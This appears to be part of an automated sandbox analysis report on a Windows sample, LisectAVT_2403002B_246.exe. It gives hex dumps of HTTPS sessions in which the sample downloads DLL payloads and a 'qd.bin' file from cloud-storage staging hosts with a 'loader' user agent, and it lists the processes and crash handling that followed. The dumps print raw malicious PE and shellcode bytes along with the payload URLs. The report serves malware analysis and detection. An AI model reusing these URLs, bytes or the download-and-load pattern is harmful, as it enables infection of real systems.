                                                                            2024-07-25 14:04:36 UTC8168INData Raw: 41 a3 00 13 01 10 3b 4d 08 72 ef b0 01 5d c3 32 c0 5d c3 33 c0 39 01 0f 94 c0 c3 33 c0 80 79 04 01 0f 9e c0 c3 57 8b 39 85 ff 75 04 33 c0 5f c3 8b 07 56 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 5e 5f c3 cc cc cc cc cc cc cc cc 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 40 c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 49 04 85 c9 0f 85 ae ff ff ff 33 c0 c3 cc cc 55 8b ec 51 8b 41 0c 89 4d fc 85 c0 79 39 53 56 57 8b 79 08 8b 07 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 8b d8 8b 45 fc 8b 78 04 8b 07 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 8b 4d fc 03 c3 5f 5e 5b 89 41 0c c9 c3 55 8b ec 8b 45 08 83 f8 03 77 0a 6b c0 0c 05 b0 23 00 10 5d c3 b8 d4 23 00 10 5d c3 55 8b ec a1 04 13 01 10 83 ec 18 33 d2 57 8b 7d 08 89 17 89 57 04 85 c0 0f 84 d8 00 00 00
                                                                            Data Ascii: A;Mr]2]393yW9u3_V0 ^_A3@I3UQAMy9SVWy0 Ex0 M_^[AUEwk#]#]U3W}W
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: 6f 40 40 00 ca 23 01 00 9a 25 01 00 86 25 01 00 68 25 01 00 4c 25 01 00 32 25 01 00 1c 25 01 00 06 25 01 00 ec 24 01 00 d0 24 01 00 bc 24 01 00 a6 24 01 00 94 24 01 00 82 24 01 00 74 24 01 00 6a 24 01 00 40 23 01 00 4c 23 01 00 5c 23 01 00 6c 23 01 00 88 23 01 00 a0 23 01 00 b2 23 01 00 4e 24 01 00 e2 23 01 00 fa 23 01 00 0a 24 01 00 1a 24 01 00 42 24 01 00 5c 24 01 00 00 00 00 00 88 22 01 00 00 00 00 00 3e 22 01 00 28 22 01 00 20 22 01 00 00 00 00 00 14 22 01 00 0c 22 01 00 00 00 00 00 52 22 01 00 6c 22 01 00 00 00 00 00 32 22 01 00 90 22 01 00 48 22 01 00 00 00 00 00 a0 3f 00 10 00 00 00 00 e4 21 01 00 00 00 00 00 00 00 00 00 9a 22 01 00 94 20 01 00 d4 21 01 00 00 00 00 00 00 00 00 00 bc 22 01 00 84 20 01 00 fc 21 01 00 00 00 00 00 00 00 00 00 dc 22 01
                                                                            Data Ascii: o@@#%%h%L%2%%%$$$$$$t$j$@#L#\#l####N$##$$B$\$">"(" """R"l"2""H"?!" !" !"
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: e0 17 6d 36 9c 91 55 dc 4b 4f 0c 63 4d ce 51 2e a0 55 53 26 4a ce 7f 0f 44 d8 1c d2 d0 1f 0f 06 3a 12 f3 53 98 99 fd 39 34 2c 23 f5 14 90 85 ce 32 51 4e 44 8d 5e 85 d2 33 7f 22 af 3c 54 7b 71 07 d0 5f ba 77 1c 4f 03 25 49 50 3a 41 db 59 a1 0f 04 24 1f 5e 06 a7 9b e9 ab b8 25 52 f3 83 af 5b 26 3d d9 37 18 cb a5 b7 e4 48 d0 c2 be ed 5f bf 36 4e e9 7b 36 55 7c 19 e1 32 22 11 ae 6c cb 0b b7 a9 71 47 5e 54 80 c8 ab 7e 05 ba 63 82 3c 52 97 40 1d 9c ea 77 02 03 01 00 01 a3 82 01 4b 30 82 01 47 30 10 06 09 2b 06 01 04 01 82 37 15 01 04 03 02 01 00 30 1d 06 03 55 1d 0e 04 16 04 14 77 92 04 78 27 b2 0b 49 07 75 97 ee e9 eb 5e 26 5c 09 44 75 30 19 06 09 2b 06 01 04 01 82 37 14 02 04 0c 1e 0a 00 53 00 75 00 62 00 43 00 41 30 0b 06 03 55 1d 0f 04 04 03 02 01 86 30 0f
                                                                            Data Ascii: m6UKOcMQ.US&JD:S94,#2QND^3"<T{q_wO%IP:AY$^%R[&=7H_6N{6U|2"lqG^T~c<R@wK0G0+70Uwx'Iu^&\Du0+7SubCA0U0
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a2 c8 b2 65 60 7b 0f 97 82 fd b0 97 ba c2 86 31 89 83 d2 34 db f4 12 22 e5 ac a6 7e 47 ce 3d 10 0e 7a ac a0 6a 7e 1d fd c7 3b 61 b6 34 46 84 a2 3d f8 a0 a7 71 6f d5 5f 68 27 36 bd 61 30 aa 51 d9 3d 79 4d f9 24 45 5a 06 92 eb 1c 34 11 c6 20 72 6f 39 bf de f0 c8 49 d5 09 8b 46 70 14 25 21 57 26 50 33 60 c3 41 17 bd dc 8a c7 01 3f 02 d4 8e dd ab 5d 47 31 0b 98 91 1c b3 0a 99 56 18 e7 f2 0b 85 8b a7 d8 06 ce 2e 69 83 bf 74 4b a2 2f d6 ab 35 69 72 1f ff d1 bb b5 91 98 96 5a 50 b4 07 04 5e f6 62 83 df b6 e3 c7 a8 90 57 c1 df 17 8c cd f3 5d 48 5f d7 55 f3 cf 9d 4f e5 2e 82 a8 5c 8e 19 49 29 2b 0d 0c 82 6c 84 8e d0 c3 82 c7 58
                                                                            Data Ascii: t Corporation0"0*H0e`{14"~G=zj~;a4F=qo_h'6a0Q=yM$EZ4 ro9IFp%!W&P3`A?]G1V.itK/5irZP^bW]H_UO.\I)+lX


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.44973543.153.232.1514437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:38 UTC135OUTGET /msvcp140.dll HTTP/1.1
                                                                            User-Agent: Mozilla/5.0
                                                                            Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:38 UTC473INHTTP/1.1 200 OK
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 446840
                                                                            Connection: close
                                                                            Accept-Ranges: bytes
                                                                            Content-Disposition: attachment
                                                                            Date: Thu, 25 Jul 2024 14:04:38 GMT
                                                                            ETag: "c766ca0482dfe588576074b9ed467e38"
                                                                            Last-Modified: Mon, 18 Mar 2024 00:34:14 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-force-download: true
                                                                            x-cos-hash-crc64ecma: 10292142785671919093
                                                                            x-cos-request-id: NjZhMjViNzZfOGFiMjQ4MGJfMTEyMWZfNjU3NGVl
                                                                            x-cos-server-side-encryption: AES256
                                                                            2024-07-25 14:04:38 UTC7731INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d 4f bd 24 c9 2e d3 77 c9 2e d3 77 c9 2e d3 77 1a 5c d2 76 cb 2e d3 77 c0 56 40 77 df 2e d3 77 cf af d2 76 ca 2e d3 77 c9 2e d2 77 08 2e d3 77 cf af d7 76 c2 2e d3 77 cf af d0 76 c0 2e d3 77 cf af d6 76 44 2e d3 77 cf af d3 76 c8 2e d3 77 cf af 2c 77 c8 2e d3 77 cf af d1 76 c8 2e d3 77 52 69 63 68 c9 2e d3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O$.w.w.w\v.wV@w.wv.w.w.wv.wv.wvD.wv.w,w.wv.wRich.w
                                                                            2024-07-25 14:04:38 UTC16368INData Raw: 10 14 5c 00 10 f0 bc 00 10 40 e0 00 10 c0 df 00 10 70 ce 00 10 60 dc 00 10 90 dc 00 10 69 6f 73 74 72 65 61 6d 00 00 00 00 69 6f 73 74 72 65 61 6d 20 73 74 72 65 61 6d 20 65 72 72 6f 72 00 00 00 60 5c 00 10 40 bd 00 10 b0 96 00 10 62 61 64 20 63 61 73 74 00 00 00 00 ac 5c 00 10 a0 b9 00 10 00 ca 03 10 00 ca 03 10 62 61 64 20 6c 6f 63 61 6c 65 20 6e 61 6d 65 00 00 00 00 00 3a 53 75 6e 3a 53 75 6e 64 61 79 3a 4d 6f 6e 3a 4d 6f 6e 64 61 79 3a 54 75 65 3a 54 75 65 73 64 61 79 3a 57 65 64 3a 57 65 64 6e 65 73 64 61 79 3a 54 68 75 3a 54 68 75 72 73 64 61 79 3a 46 72 69 3a 46 72 69 64 61 79 3a 53 61 74 3a 53 61 74 75 72 64 61 79 00 00 00 3a 4a 61 6e 3a 4a 61 6e 75 61 72 79 3a 46 65 62 3a 46 65 62 72 75 61 72 79 3a 4d 61 72 3a 4d 61 72 63 68 3a 41 70 72 3a 41 70
                                                                            Data Ascii: \@p`iostreamiostream stream error`\@bad cast\bad locale name:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday:Jan:January:Feb:February:Mar:March:Apr:Ap
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 10 38 6a 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 b8 3e 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 14 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 3f 06 10 68 6a 00 10 00 00 00 00 01 00 00 00 06 00 00 00 78 6a 00 10 94 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 10 3f 06 10 05 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 68 6a 00 10 38 3f 06 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6a 00 10 00 00 00 00 01 00 00 00 05 00 00 00 dc 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 3f 06 10 08 6b 00 10 00 00 00 00 01 00 00 00 06 00 00 00 18 6b 00 10 34 6b 00 10 b0 6a 00 10 e8 67
                                                                            Data Ascii: 8j(]\D]>@j?hjxjjjg(]\D]?@hj8?@jjjg(]\D]X?kk4kjg
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 08 e8 2f 01 00 00 83 65 fc 00 c7 06 80 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 01 44 29 00 10 89 41 08 c7 41 04 88 29 00 10 89 45 fc c7 01 80 29 00 10 83 4d fc ff 8b c1 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 43 cb 03 10 64 a1 00 00 00 00 50 51 56 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 ff 75 08 e8 7f 00 00 00 83 65 fc 00 c7 06 64 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7
                                                                            Data Ascii: /e)MMdY^UjhmdPQ23PEdM3D)AA)E)MMdYUjhCdPQV23PEduued)MMdY^UjhmdPQ23PEdM3
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 31 ce 03 10 e8 65 11 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 d8 2e 00 10 e8 42 02 00 00 8d 45 bc 8b ce 50 e8 a7 1d 00 00 8d 4d bc e8 7f 08 00 00 8b c6 e8 06 11 03 00 c2 04 00 cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 ff 75 08 8b f1 89 75 fc 89 46 04 c7 06 98 2e 00 10 e8 72 1d 00 00 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 6a 38 b8 31 ce 03 10 e8 e5 10 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 98 2e 00 10 e8 c2 01 00 00 8d 45 bc 8b ce 50 e8 27 1d 00 00 8d 4d bc e8 ff 07 00 00 8b c6 e8 86 10 03 00 c2 04 00 cc cc cc cc cc 56 8b f1 56 e8 c7 5a 00 00 59 8b c6 5e c3 cc cc c7 01 90 2a 00 10 8b c1 c2 04 00 cc cc cc cc cc c7 01 90 2a 00 10 8b c1 c3 a1 18 46 06 10 c7 05 38 49
                                                                            Data Ascii: 1euEFeMh`-.BEPMUQEVuuF.r^j81uEFeMh`-.EP'MVVZY^**F8I
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 00 e4 ff ff 68 48 09 04 10 8d 45 f4 50 e8 bb ff 02 00 cc cc cc cc cc cc cc 56 8b f1 8b 46 10 85 c0 7e 0b ff 76 0c ff 15 cc 61 06 10 eb 0a 79 09 ff 76 0c e8 69 f3 02 00 59 ff 76 14 ff 15 cc 61 06 10 59 5e c3 cc cc cc cc 55 8b ec 6a ff 68 a4 cf 03 10 64 a1 00 00 00 00 50 56 57 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 6a 00 e8 b3 f3 ff ff 8b 47 28 85 c0 74 12 8b 30 6a 10 50 e8 7c ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 28 00 8b 47 2c 85 c0 74 12 8b 30 6a 0c 50 e8 5f ed 02 00 8b c6 59 59 85 f6 75 ee 83 67 2c 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e c9 c3 cc cc cc cc cc 56 8b f1 8b 46 14 83 f8 0f 76 0b 40 50 ff 36 e8 1e d6 ff ff 59 59 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 cc cc cc cc cc cc cc cc cc
                                                                            Data Ascii: UMhHEPVF~vayviYvaY^UjhdPVW23PEdjG(t0jP|YYug(G,t0jP_YYug,MdY_^VFv@P6YYfF^
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 56 57 ff 75 0c 8b f9 ff 75 08 8b 07 8b 70 24 8b ce ff 15 30 63 06 10 8b cf ff d6 5f 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 6a 30 b8 6a d1 03 10 e8 78 d1 02 00 8b d9 8b 43 1c 8b 08 85 c9 74 23 8b 53 2c 8b 32 8d 04 0e 3b c8 73 17 8d 46 ff 89 02 8b 4b 1c 8b 11 8d 42 01 89 01 0f b6 02 e9 51 01 00 00 83 7b 4c 00 75 08 83 c8 ff e9 43 01 00 00 8b cb e8 11 df ff ff 8b 4b 4c 33 d2 39 53 38 75 19 51 8d 45 d6 50 e8 a6 b6 ff ff 59 59 84 c0 74 d7 0f b6 45 d6 e9 19 01 00 00 33 c0 8d 7d d8 ab ab ab ab 89 55 e8 c7 45 ec 0f 00 00 00 88 55 d8 51 89 55 fc ff 15 98 62 06 10 83 cf ff e9 90 00 00 00 50 8d 4d d8 e8 54 f8 ff ff 83 7d ec 0f 8d 4d d8 8b 53 38 89 55 c8 76 03 8b 4d d8 8b 45 e8 03 c1 83 7d ec 0f 89 45 cc 8d 4d d8 76 03 8b 4d d8 8b 02 8b 70 18 8d 45 c4 50
                                                                            Data Ascii: VWuup$0c_^]j0jxCt#S,2;sFKBQ{LuCKL39S8uQEPYYtE3}UEUQUbPMT}MS8UvME}EMvMpEP
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 0f 8d 75 c0 76 03 8b 75 c0 8a 06 3c 7f 74 32 8b 7d ac 84 c0 7e 28 0f be c8 8b c7 2b c3 3b c8 73 1d ff 75 98 2b f9 8d 4d d8 6a 01 57 e8 6e 34 00 00 80 7e 01 00 7e 01 46 8a 06 3c 7f 75 d4 8b 7d bc 83 7f 24 00 8b 45 e8 89 45 a0 7c 13 7f 06 83 7f 20 00 76 0b 8b 77 20 3b f0 76 04 2b f0 eb 02 33 f6 8b 47 14 25 c0 01 00 00 83 f8 40 0f 84 83 00 00 00 3d 00 01 00 00 74 38 56 ff 75 18 8d 45 a4 ff 75 10 ff 75 0c 50 ff 75 b8 e8 e5 20 00 00 83 c4 18 33 f6 83 7d ec 0f 8b 08 8b 50 04 8d 45 d8 89 4d 0c 89 55 10 76 03 8b 45 d8 53 50 52 51 eb 58 83 7d ec 0f 8d 45 d8 76 03 8b 45 d8 53 50 ff 75 10 8d 45 a4 ff 75 0c 50 ff 75 b8 e8 63 20 00 00 56 ff 75 18 8b 08 8b 40 04 50 89 45 10 8d 45 a4 51 50 ff 75 b8 89 4d 0c e8 86 20 00 00 83 c4 30 33 f6 eb 23 83 7d ec 0f 8d 45 d8 76 03
                                                                            Data Ascii: uvu<t2}~(+;su+MjWn4~~F<u}$EE| vw ;v+3G%@=t8VuEuuPu 3}PEMUvESPRQX}EvESPuEuPuc Vu@PEEQPuM 03#}Ev
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 33 c0 eb 07 53 e8 24 f4 ff ff 59 ff 75 f0 50 56 e8 98 fc ff ff 83 c4 0c b9 90 49 06 10 e8 bb 8b ff ff 85 db 75 4a 6a 18 89 45 f0 e8 65 93 02 00 8b f0 59 89 75 e8 c7 45 fc 07 00 00 00 85 f6 74 1a 21 5e 04 53 ff 75 08 8b ce c6 45 fc 08 c7 06 c8 32 00 10 e8 ba f8 ff ff eb 02 33 f6 ff 75 f0 83 4d fc ff 56 57 e8 42 fc ff ff 83 c4 0c eb 13 53 8b f0 e8 4b f4 ff ff 56 50 57 e8 2d fc ff ff 83 c4 10 83 7d ec 00 74 4a b9 c0 46 06 10 e8 4a 8b ff ff 8b f0 85 db 75 29 6a 08 e8 f5 92 02 00 89 45 e8 59 85 c0 74 0b 21 58 04 c7 00 1c 30 00 10 eb 02 33 c0 56 50 57 e8 f0 fb ff ff 83 c4 0c eb 11 53 e8 39 78 ff ff 56 50 57 e8 dd fb ff ff 83 c4 10 8b 75 08 53 57 ff 75 0c 56 e8 0c 5d 01 00 53 57 ff 75 0c 56 e8 b1 c2 00 00 53 8b 5d 0c 57 53 56 e8 c5 bd 00 00 09 5f 10 83 c4 30 8b
                                                                            Data Ascii: 3S$YuPVIuJjEeYuEt!^SuE23uMVWBSKVPW-}tJFJu)jEYt!X03VPWS9xVPWuSWuV]SWuVS]WSV_0
                                                                            2024-07-25 14:04:38 UTC8184INData Raw: 10 50 ff 36 e8 93 ff ff ff 5e c9 c2 08 00 ff 25 10 61 06 10 55 8b ec 6a ff ff 75 08 e8 0e 00 00 00 84 c0 75 06 ff 15 50 62 06 10 5d c2 04 00 55 8b ec 8b 45 08 6a 00 ff 75 0c 83 c0 04 50 8d 41 04 50 ff 15 00 61 06 10 85 c0 0f 95 c0 5d c2 08 00 cc cc cc cc 55 8b ec 8b 45 08 83 c0 04 50 ff 15 04 61 06 10 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 7d 08 00 74 07 5d ff 25 cc 61 06 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 6a 28 6a 01 83 26 00 ff 15 d0 61 06 10 59 59 85 c0 75 03 40 eb 0b 83 20 00 83 60 04 00 89 06 33 c0 5e 5d c3 cc cc cc cc cc 55 8b ec 8b 45 08 83 c0 04 50 ff 15 08 61 06 10 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 a1 80 32 06 10 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75
                                                                            Data Ascii: P6^%aUjuuPb]UEjuPAPa]UEPa3]U}t]%a]UVuj(j&aYYu@ `3^]UEPa3]U23EES]Vu


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.44973643.152.64.2074437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:40 UTC132OUTGET /MSASN1.dll HTTP/1.1
                                                                            User-Agent: Mozilla/5.0
                                                                            Host: www80-1323570959.cos.ap-singapore.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:41 UTC472INHTTP/1.1 200 OK
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 10240
                                                                            Connection: close
                                                                            Accept-Ranges: bytes
                                                                            Content-Disposition: attachment
                                                                            Date: Thu, 25 Jul 2024 14:04:41 GMT
                                                                            ETag: "5e4ed4c5e1053d9c6cca98c0391fafbd"
                                                                            Last-Modified: Wed, 20 Mar 2024 05:28:11 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-force-download: true
                                                                            x-cos-hash-crc64ecma: 11971115341371203562
                                                                            x-cos-request-id: NjZhMjViNzlfOTllZjc4MGJfMjQ1YzFfNjg4Yzky
                                                                            x-cos-server-side-encryption: AES256
                                                                            2024-07-25 14:04:41 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f5 2e 5f b2 b1 4f 31 e1 b1 4f 31 e1 b1 4f 31 e1 b8 37 a2 e1 b3 4f 31 e1 73 ce 30 e0 b3 4f 31 e1 73 ce 34 e0 bb 4f 31 e1 73 ce 35 e0 bb 4f 31 e1 73 ce 32 e0 b0 4f 31 e1 fa 37 30 e0 b4 4f 31 e1 b1 4f 30 e1 94 4f 31 e1 5e cd 38 e0 b3 4f 31 e1 5e cd ce e1 b0 4f 31 e1 5e cd 33 e0 b0 4f 31 e1 52 69 63 68 b1 4f 31 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 73 fa 65 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$._O1O1O17O1s0O1s4O1s5O1s2O170O1O0O1^8O1^O1^3O1RichO1PELse
                                                                            2024-07-25 14:04:41 UTC2508INData Raw: 00 6a 00 ff 73 38 ff 73 38 6a 00 6a 00 ff 53 0c 6a ff 50 ff 53 10 68 00 80 00 00 6a 00 ff 75 fc ff 53 08 5f 5e 33 c0 5b c9 c3 55 8b ec 83 ec 1c 53 56 8b f1 8b da 57 89 5d f4 89 75 f8 8b 46 3c 8b 44 30 78 03 c6 8b 50 20 8b 48 1c 03 d6 89 55 fc 03 ce 8b 50 24 03 d6 89 4d e4 89 55 e8 f7 c3 00 00 ff ff 74 4e 8b 40 18 33 d2 89 45 ec 8b fa 85 c0 74 48 8b 45 fc 8b 1c b8 03 de 8b f2 8a 0b 6b f6 7f 0f be c1 03 f0 43 84 c9 75 f1 8b 5d f4 89 75 f0 8b 75 f8 3b 5d f0 74 08 47 3b 7d ec 72 d3 eb 19 8b 45 e8 8b 4d e4 0f b7 04 78 8b 04 81 03 c6 eb 0a 2b 58 10 8b 14 99 03 d6 8b c2 5f 5e 5b c9 c3 64 a1 18 00 00 00 8b 40 30 8b 40 0c 8b 40 0c 8b 00 8b 00 8b 40 18 c3 55 8b ec 83 ec 0c 53 56 57 8b d9 e8 d9 ff ff ff 8b f8 c7 45 f4 57 73 32 5f ba 54 be 48 01 c7 45 f8 33 32 2e 64
                                                                            Data Ascii: js8s8jjSjPShjuS_^3[USVW]uF<D0xP HUP$MUtN@3EtHEkCu]uu;]tG;}rEMx+X_^[d@0@@@USVWEWs2_THE32.d


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449739159.75.57.364437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:46 UTC123OUTGET /qd.bin HTTP/1.1
                                                                            User-Agent: loader
                                                                            Host: wwwqd-1323571107.cos.ap-guangzhou.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:46 UTC235INHTTP/1.1 451 Unavailable For Legal Reasons
                                                                            Content-Type: application/xml
                                                                            Content-Length: 477
                                                                            Connection: close
                                                                            Date: Thu, 25 Jul 2024 14:04:46 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-request-id: NjZhMjViN2VfNGYxNDdiMGJfYTNjOF8yMzMxYjdi
                                                                            2024-07-25 14:04:46 UTC477INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 75 74 66 2d 38 27 20 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 09 3c 43 6f 64 65 3e 55 6e 61 76 61 69 6c 61 62 6c 65 46 6f 72 4c 65 67 61 6c 52 65 61 73 6f 6e 73 3c 2f 43 6f 64 65 3e 0a 09 3c 4d 65 73 73 61 67 65 3e 44 75 65 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 69 73 20 61 72 72 65 61 72 73 2c 20 69 74 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 20 75 6e 74 69 6c 20 79 6f 75 20 72 65 63 68 61 72 67 65 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 09 3c 52 65 73 6f 75 72 63 65 3e 2f 71 64 2e 62 69 6e 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 09 3c 52 65 71 75 65 73 74 49 64 3e 4e 6a 5a 68 4d 6a 56 69 4e 32 56 66 4e 47 59 78 4e 44 64 69 4d 47 4a 66 59 54 4e 6a 4f 46 38 79 4d 7a
                                                                            Data Ascii: <?xml version='1.0' encoding='utf-8' ?><Error><Code>UnavailableForLegalReasons</Code><Message>Due to your account is arrears, it is unavailable until you recharge.</Message><Resource>/qd.bin</Resource><RequestId>NjZhMjViN2VfNGYxNDdiMGJfYTNjOF8yMz


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:10:04:23
                                                                            Start date:25/07/2024
                                                                            Path:C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_246.exe"
                                                                            Imagebase:0xed0000
                                                                            File size:344'224 bytes
                                                                            MD5 hash:8B5EB95F4A065EBF2719FE29321CA7FF
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:10:04:23
                                                                            Start date:25/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:10:04:46
                                                                            Start date:25/07/2024
                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040
                                                                            Imagebase:0x7e0000
                                                                            File size:483'680 bytes
                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:9%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:1.7%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:54
